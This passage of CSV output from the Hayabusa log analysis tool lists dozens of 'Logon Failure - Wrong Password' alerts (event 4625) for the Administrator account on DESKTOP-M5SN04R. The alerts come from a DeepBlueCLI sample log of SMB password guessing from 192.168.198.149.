NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.579 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hSQRgB8yMfhb03g1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.614 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bzbZjRXTc0XvV4Ry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k3ShOCSaLGX4YBWE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lIrydzi8nmY251Z1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h4vlRksTGxAqEt9j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:45.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uJMnD0foEDbcNfTj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.829 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNWppBJLFojEFtiF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7a9Tvr6ruDpiG2T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBNIizCKz2ybc3eM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YwuXQhISpgfSFqZ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.011 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeONLdrrauxqvgaT : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RFqSH4toadsTideV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HuMa0Juj1tjL6NDY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UA8zU0kJ6gAFqSaF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jvX85gF8wk3AGJyb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OpzOMKQIBrkQW5Os : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:46.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cqzrLAqHNi4CHT56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HWMap8qHlykO6Yeu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pkc9LWakJBjhBQv6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y43cE75gTzA1XjHF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HopaYDAbYxHjJEr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: brNgudTWJaKs8nLd : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MzPwOqU92kdGodBH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXlzxK5OXL9hpqrZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2cLdgWvrVh7h2jPk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.717 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h34xlYavVsXQRCYG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6wjflwqXyFzYTi0b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:46.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MlsuCSajqGUYTBWL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xQDdrQQZ5xYBDiRi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JX5NMuwUsOZEp3zh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfrbGLqKGru8AE2a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 813natbodi6QauRW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KpfKxOZG3xSr5Yqm : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fErWiEb0USDghXsB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fOWF6YnW8UEPlw41 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SNPXuHduatLFQc8W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 35rfur4MzKzwxCIn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VmAqzaZaeoSjcuh5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:47.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lKuCpuGcGmDOoewr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bz6SOAeTyqsBz6Oa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.317 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CSURiEoC7dw0w0ru : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDjwkaHT8lrFmn9X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ayI129HgVWA5q4Sk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jT2yiuOJS8Fvf9SD : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1hpAO2UrjFd6Kxt0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZkgGj9Fnqn3XwnBT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WFXPYo0yzR7p8dNU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9j6MxN7PuM29Vlcq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w1CWIqoV6GzmmlRm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:47.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uiBfvnfTcIG4xJoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dED7HYntoE5D7XvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pX1ztnCKiePrPbTT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u3XQcfMHJDsBtJDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhRsRIS5tHKLv2oL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmkLhptugDU2fDWp : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2yk62yREbgDCj9pB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6JPvkmaAsJlwn9t3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.034 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lhciP1zM9njlRI3j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: duNDenwdo1oHVuoL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.114 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0ChBZOYkTm1SguA1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:48.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RU38tuiKC0weexmb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jg0Hp4xtz0pAMhCz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.231 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5AorVNz5MgTeEvn2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8oJ6tVjBxlYyj5ej : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oEAEOi0TsSRVPlz4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: USfEwKkH8OUADVds : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y0jg1i6tDiInd10i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xv2jRzrgoP6lJdAJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LmuAXUwSkhR3tSRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zy4Fkpvcrlmp9AES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 51ipUXvrRh0CPH1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:48.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TB15XKzVJwIyjqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i1F6muFPBlPyHPbR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XNXwYS73RElHozUo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ft1MLPJISeq0bMsa : IP Address: 192.168.198.149 : AuthPackage: 